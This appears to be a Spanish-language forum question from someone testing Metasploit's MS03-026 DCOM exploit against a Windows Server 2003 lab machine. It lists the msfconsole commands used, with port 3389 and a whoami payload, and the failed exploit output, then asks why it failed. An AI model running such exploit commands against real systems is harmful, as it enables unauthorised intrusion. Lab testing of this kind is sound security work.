Estoy probando en 2 PC como esta:
"víctima": solo publicación abierta 3389, ejecutando Windows Server 2003.
Cliente / metasploit:
msfconsole > use exploit/windows/dcerpc/ms03_026_dcom
> set RHOST <IP GOES HERE>
> set RPORT 3389
> set PAYLOAD windows/exec
> set CMD whoami
> exploit
Resultado:
Trying target...
Binding to...
Exploit failed: ECONNRESET: an existing connection was forcibly closed by the remote host.
======================================
Ya que el escritorio remoto ya está usando 3389 pero no puedo usar otros puertos: ¿significa esto que debería haber abierto un puerto en la otra PC que no está siendo utilizado por algo en este momento? ¿O simplemente que el host no es vulnerable?